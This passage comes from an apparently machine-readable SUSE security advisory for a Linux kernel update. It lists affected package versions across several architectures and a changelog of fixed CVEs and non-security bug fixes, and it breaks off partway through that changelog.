"kernel-trace-debugsource-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-ec2-debuginfo", "packageFilename": "kernel-ec2-debuginfo-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-bigmem-debuginfo", "packageFilename": "kernel-bigmem-debuginfo-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-default-man", "packageFilename": "kernel-default-man-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ia64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.0.101-88.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-bigmem", "packageFilename": "kernel-bigmem-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-bigmem-debugsource", "packageFilename": "kernel-bigmem-debugsource-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-trace-debugsource", "packageFilename": "kernel-trace-debugsource-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-bigmem-devel", "packageFilename": "kernel-bigmem-devel-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-ec2-debugsource", "packageFilename": "kernel-ec2-debugsource-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.4", "packageVersion": "3.0.101-88.3", "arch": "noarch", "packageName": "kernel-docs", "packageFilename": "kernel-docs-3.0.101-88.3.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-pae-debugsource", "packageFilename": "kernel-pae-debugsource-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-ec2-devel", "packageFilename": "kernel-ec2-devel-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-pae-base", "packageFilename": "kernel-pae-base-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-ec2-debugsource", "packageFilename": "kernel-ec2-debugsource-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-trace-devel-debuginfo", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-default-devel-debuginfo", "packageFilename": "kernel-default-devel-debuginfo-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ia64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.0.101-88.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ia64", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-88.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-ppc64-base", "packageFilename": "kernel-ppc64-base-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ia64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-88.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ia64", "packageName": "kernel-trace-debuginfo", "packageFilename": "kernel-trace-debuginfo-3.0.101-88.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-ec2-devel", "packageFilename": "kernel-ec2-devel-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-ppc64", "packageFilename": "kernel-ppc64-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-pae-extra", "packageFilename": "kernel-pae-extra-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-trace-debugsource", "packageFilename": "kernel-trace-debugsource-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-ppc64-debuginfo", "packageFilename": "kernel-ppc64-debuginfo-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-trace-extra", "packageFilename": "kernel-trace-extra-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-bigmem-base", "packageFilename": "kernel-bigmem-base-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-xen-extra", "packageFilename": "kernel-xen-extra-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ia64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-88.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-default-devel-debuginfo", "packageFilename": "kernel-default-devel-debuginfo-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-xen-devel-debuginfo", "packageFilename": "kernel-xen-devel-debuginfo-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ia64", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-88.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-trace-debuginfo", "packageFilename": "kernel-trace-debuginfo-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-88.1", "arch": "ia64", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.0.101-88.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-ppc64-extra", "packageFilename": "kernel-ppc64-extra-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-ec2", "packageFilename": "kernel-ec2-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ia64", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-88.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-xen-base", "packageFilename": "kernel-xen-base-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-trace-devel-debuginfo", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-xen-extra", "packageFilename": "kernel-xen-extra-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-default-devel-debuginfo", "packageFilename": "kernel-default-devel-debuginfo-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-trace-debuginfo", "packageFilename": "kernel-trace-debuginfo-3.0.101-88.1.i586.rpm", "operator": "lt"}], "edition": 1, "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various\n security and bugfixes.\n\n For the PowerPC64 a new &quot;bigmem&quot; flavor has been added to support big\n Power machines. (FATE#319026)\n\n The following security bugs were fixed:\n\n - CVE-2016-7042: The proc_keys_show function in security/keys/proc.c in\n the Linux kernel, when the GNU Compiler Collection (gcc) stack protector\n is enabled, uses an incorrect buffer size for certain timeout data,\n which allowed local users to cause a denial of service (stack memory\n corruption and panic) by reading the /proc/keys file (bnc#1004517).\n - CVE-2016-7097: The filesystem implementation in the Linux kernel\n preserves the setgid bit during a setxattr call, which allowed local\n users to gain group privileges by leveraging the existence of a setgid\n program with restrictions on execute permissions (bnc#995968).\n - CVE-2015-8956: The rfcomm_sock_bind function in\n net/bluetooth/rfcomm/sock.c in the Linux kernel allowed local users to\n obtain sensitive information or cause a denial of service (NULL pointer\n dereference) via vectors involving a bind system call on a Bluetooth\n RFCOMM socket (bnc#1003925).\n - CVE-2016-7117: Use-after-free vulnerability in the __sys_recvmmsg\n function in net/socket.c in the Linux kernel allowed remote attackers to\n execute arbitrary code via vectors involving a recvmmsg system call that\n is mishandled during error processing (bnc#1003077).\n - CVE-2016-0823: The pagemap_open function in fs/proc/task_mmu.c in the\n Linux kernel allowed local users to obtain sensitive physical-address\n information by reading a pagemap file, aka Android internal bug 25739721\n (bnc#994759).\n - CVE-2016-7425: The arcmsr_iop_message_xfer function in\n drivers/scsi/arcmsr/arcmsr_hba.c in the Linux kernel did not restrict a\n certain length field, which allowed local users to gain privileges or\n cause a denial of service (heap-based buffer overflow) via an\n ARCMSR_MESSAGE_WRITE_WQBUFFER control code (bnc#999932).\n - CVE-2016-3841: The IPv6 stack in the Linux kernel mishandled options\n data, which allowed local users to gain privileges or cause a denial of\n service (use-after-free and system crash) via a crafted sendmsg system\n call (bnc#992566).\n - CVE-2016-6828: The tcp_check_send_head function in include/net/tcp.h in\n the Linux kernel did not properly maintain certain SACK state after a\n failed data copy, which allowed local users to cause a denial of service\n (tcp_xmit_retransmit_queue use-after-free and system crash) via a\n crafted SACK option (bnc#994296).\n - CVE-2016-5696: net/ipv4/tcp_input.c in the Linux kernel did not properly\n determine the rate of challenge ACK segments, which made it easier for\n remote attackers to hijack TCP sessions via a blind in-window attack\n (bnc#989152).\n - CVE-2016-6480: Race condition in the ioctl_send_fib function in\n drivers/scsi/aacraid/commctrl.c in the Linux kernel allowed local users\n to cause a denial of service (out-of-bounds access or system crash) by\n changing a certain size value, aka a &quot;double fetch&quot; vulnerability\n (bnc#991608).\n - CVE-2016-4998: The IPT_SO_SET_REPLACE setsockopt implementation in the\n netfilter subsystem in the Linux kernel allowed local users to cause a\n denial of service (out-of-bounds read) or possibly obtain sensitive\n information from kernel heap memory by leveraging in-container root\n access to provide a crafted offset value that leads to crossing a\n ruleset blob boundary (bnc#986365).\n - CVE-2015-7513: arch/x86/kvm/x86.c in the Linux kernel did not reset the\n PIT counter values during state restoration, which allowed guest OS\n users to cause a denial of service (divide-by-zero error and host OS\n crash) via a zero value, related to the kvm_vm_ioctl_set_pit and\n kvm_vm_ioctl_set_pit2 functions (bnc#960689).\n - CVE-2013-4312: The Linux kernel allowed local users to bypass\n file-descriptor limits and cause a denial of service (memory\n consumption) by sending each descriptor over a UNIX socket before\n closing it, related to net/unix/af_unix.c and net/unix/garbage.c\n (bnc#839104 bsc#922947 bsc#968014).\n\n The following non-security bugs were fixed:\n\n - ahci: Order SATA device IDs for codename Lewisburg (fate#319286).\n - ahci: Remove obsolete Intel Lewisburg SATA RAID device IDs (fate#319286).\n - alsa: hda - Add Intel Lewisburg device IDs Audio (fate#319286).\n - arch/powerpc: Remove duplicate/redundant Altivec entries (bsc#967716).\n - avoid dentry crash triggered by NFS (bsc#984194).\n - bigmem: Add switch to configure bigmem patches (bsc#928138,fate#319026).\n - blktap2: eliminate deadlock potential from shutdown path (bsc#909994).\n - blktap2: eliminate race from deferred work queue handling (bsc#911687).\n - bnx2x: fix lockdep splat (bsc#908684 FATE#317539).\n - bonding: always set recv_probe to bond_arp_rcv in arp monitor\n (bsc#977687).\n - bonding: fix bond_arp_rcv setting and arp validate desync state\n (bsc#977687).\n - btrfs: account for non-CoW'd blocks in btrfs_abort_transaction\n (bsc#983619).\n - btrfs: ensure that file descriptor used with subvol ioctls is a dir\n (bsc#999600).\n - cdc-acm: added sanity checking for probe() (bsc#993891).\n - config.conf: add bigmem flavour on ppc64\n - cpumask, nodemask: implement cpumask/nodemask_pr_args() (bnc1003866).\n - cxgb4: Set VPD size so we can read both VPD structures (bsc#976867).\n - dm space map metadata: fix sm_bootstrap_get_nr_blocks() (FATE#313903).\n - dm thin: fix race condition when destroying thin pool workqueue\n (FATE#313903).\n - drivers: hv: vmbus: avoid scheduling in interrupt context in\n vmbus_initiate_unload() (bnc#986337).\n - drivers: hv: vmbus: avoid wait_for_completion() on crash (bnc#986337).\n - drivers: hv: vmbus: do not loose HVMSG_TIMER_EXPIRED messages\n (bnc#986337).\n - drivers: hv: vmbus: do not send CHANNELMSG_UNLOAD on pre-Win2012R2 hosts\n (bnc#986337).\n - drivers: hv: vmbus: handle various crash scenarios (bnc#986337).\n - drivers: hv: vmbus: remove code duplication in message handling\n (bnc#986337).\n - drivers: hv: vss: run only on supported host versions (bnc#986337).\n - fs/cifs: cifs_get_root shouldn't use path with tree name (bsc#963655,\n bsc#979681).\n - fs/cifs: Compare prepaths when comparing superblocks (bsc#799133).\n - fs/cifs: Fix memory leaks in cifs_do_mount() (bsc#799133).\n - fs/cifs: Fix regression which breaks DFS mounting (bsc#799133).\n - fs/cifs: fix wrongly prefixed path to root (bsc#963655, bsc#979681)\n - fs/cifs: make share unaccessible at root level mountable (bsc#799133).\n - fs/cifs: Move check for prefix path to within cifs_get_root()\n (bsc#799133).\n - fs/select: add vmalloc fallback for select(2) (bsc#1000189).\n - hv: do not lose pending heartbeat vmbus packets (bnc#1006919).\n - i2c: i801: add Intel Lewisburg device IDs (fate#319286).\n - i40e: fix an uninitialized variable bug (bsc#909484 FATE#317397).\n - include/linux/mmdebug.h: should include linux/bug.h (bnc#971975 VM\n performance -- git fixes).\n - increase CONFIG_NR_IRQS 512 -&gt; 2048 reportedly irq error with multiple\n nvme and tg3 in the same machine is resolved by increasing\n CONFIG_NR_IRQS (bsc#998399)\n - introduce SIZE_MAX (bsc#1000189).\n - ipv6: replacing a rt6_info needs to purge possible propagated rt6_infos\n too (bsc#865783).\n - kabi: Import kabi files from 3.0.101-80\n - kabi-fix for flock_owner addition (bsc#998689).\n - kabi, unix: properly account for FDs passed over unix sockets\n (bnc#839104).\n - kaweth: fix firmware download (bsc#993890).\n - kaweth: fix oops upon failed memory allocation (bsc#993890).\n - kvm: x86: only channel 0 of the i8254 is linked to the HPET (bsc#960689).\n - kvm: x86: SYSENTER emulation is broken (bsc#994618).\n - libata: support the ata host which implements a queue depth less than 32\n (bsc#871728)\n - libfc: sanity check cpu number extracted from xid (bsc#988440).\n - lib/vsprintf: implement bitmap printing through '%*pb[l]' (bnc#1003866).\n - lpfc: call lpfc_sli_validate_fcp_iocb() with the hbalock held\n (bsc#951392).\n - bigmem: make bigmem patches configurable (bsc#928138,fate#319026).\n - md: check command validity early in md_ioctl() (bsc#1004520).\n - md: Drop sending a change uevent when stopping (bsc#1003568).\n - md: fix problem when adding device to read-only array with bitmap\n (bnc#771065).\n - md: lockless I/O submission for RAID1 (bsc#982783).\n - md/raid10: always set reshape_safe when initializing reshape_position\n (fate#311379).\n - md/raid10: Fix memory leak when raid10 reshape completes (fate#311379).\n - mm: fix sleeping function warning from __put_anon_vma (bnc#1005857).\n - mm/memory.c: actually remap enough memory (bnc#1005903).\n - mm: thp: fix SMP race condition between THP page fault and MADV_DONTNEED\n (VM Functionality, bnc#986445).\n - mm, vmscan: Do not wait for page writeback for GFP_NOFS allocations\n (bnc#763198).\n - Move patches that create ppc64-bigmem to the powerpc section. Add\n comments that outline the procedure and warn the unsuspecting.\n - move the call of __d_drop(anon) into __d_materialise_unique(dentry,\n anon) (bsc#984194).\n - mpt2sas, mpt3sas: Fix panic when aer correct error occurred (bsc#997708).\n - mshyperv: fix recognition of Hyper-V guest crash MSR's (bnc#986337).\n - net: add pfmemalloc check in sk_add_backlog() (bnc#920016).\n - netback: fix flipping mode (bsc#996664).\n - netfilter: ipv4: defrag: set local_df flag on defragmented skb\n (bsc#907611).\n - netvsc: fix incorrect receive checksum offloading (bnc#1006917).\n - nfs4: reset states to use open_stateid when returning delegation\n voluntarily (bsc#1007944).\n - nfs: Do not disconnect open-owner on NFS4ERR_BAD_SEQID (bsc#989261).\n - nfs: Do not drop directory dentry which is in use (bsc#993127).\n - nfs: Do not write enable new pages while an invalidation is proceeding\n (bsc#999584).\n - nfs: Fix an LOCK/OPEN race when unlinking an open file (bsc#956514).\n - nfs: Fix a regression in the read() syscall (bsc#999584).\n - nfs: Fix races in nfs_revalidate_mapping (bsc#999584).\n - nfs: fix the handling of NFS_INO_INVALID_DATA flag in\n nfs_revalidate_mapping (bsc#999584).\n - nfs: Fix writeback performance issue on cache invalidation (bsc#999584).\n - nfs: Refresh open-owner id when server says SEQID is bad (bsc#989261).\n - nfsv4.1: Fix an NFSv4.1 state renewal regression (bnc#863873).\n - nfsv4: add flock_owner to open context (bnc#998689).\n - nfsv4: change nfs4_do_setattr to take an open_context instead of a\n nfs4_state (bnc#998689).\n - nfsv4: change nfs4_select_rw_stateid to take a lock_context inplace of\n lock_owner (bnc#998689).\n - nfsv4: do not check MAY_WRITE access bit in OPEN (bsc#985206).\n - nfsv4: enhance nfs4_copy_lock_stateid to use a flock stateid if there is\n one (bnc#998689).\n - nfsv4: fix broken patch relating to v4 read delegations (bsc#956514,\n bsc#989261, bsc#979595).\n - nfsv4: Fix range checking in __nfs4_get_acl_uncached and\n __nfs4_proc_set_acl (bsc#982218).\n - oom: print nodemask in the oom report (bnc#1003866).\n - pci: Add pci_set_vpd_size() to set VPD size (bsc#976867).\n - pciback: fix conf_space read/write overlap check.\n - pciback: return proper values during BAR sizing.\n - pci_ids: Add PCI device ID functions 3 and 4 for newer F15h models\n (fate#321400).\n - pm / hibernate: Fix rtree_next_node() to avoid walking off list ends\n (bnc#860441).\n - powerpc/64: Fix incorrect return value from __copy_tofrom_user\n (bsc#1005896).\n - powerpc: Add ability to build little endian kernels (bsc#967716).\n - powerpc: add kernel parameter iommu_alloc_quiet (bsc#994926).\n - powerpc: Avoid load of static chain register when calling nested\n functions through a pointer on 64bit (bsc#967716).\n - powerpc: blacklist fixes for unsupported subarchitectures ppc32 only:\n 6e0fdf9af216 powerpc: fix typo 'CONFIG_PMAC' obscure hardware:\n f7e9e3583625 powerpc: Fix missing L2 cache size in\n /sys/devices/system/cpu\n - powerpc: Build fix for powerpc KVM (bsc#928138,fate#319026).\n - powerpc: Do not build assembly files with ABIv2 (bsc#967716).\n - powerpc: Do not use ELFv2 ABI to build the kernel (bsc#967716).\n - powerpc: dtc is required to build dtb files (bsc#967716).\n - powerpc: Fix 64 bit builds with binutils 2.24 (bsc#967716).\n - powerpc: Fix error when cross building TAGS &amp; cscope (bsc#967716).\n - powerpc: Make the vdso32 also build big-endian (bsc#967716).\n - powerpc: Make VSID_BITS* dependency explicit (bsc#928138,fate#319026).\n - powerpc/mm: Add 64TB support (bsc#928138,fate#319026).\n - powerpc/mm: Change the swap encoding in pte (bsc#973203).\n - powerpc/mm: Convert virtual address to vpn (bsc#928138,fate#319026).\n - powerpc/mm: Fix hash computation function (bsc#928138,fate#319026).\n - powerpc/mm: Increase the slice 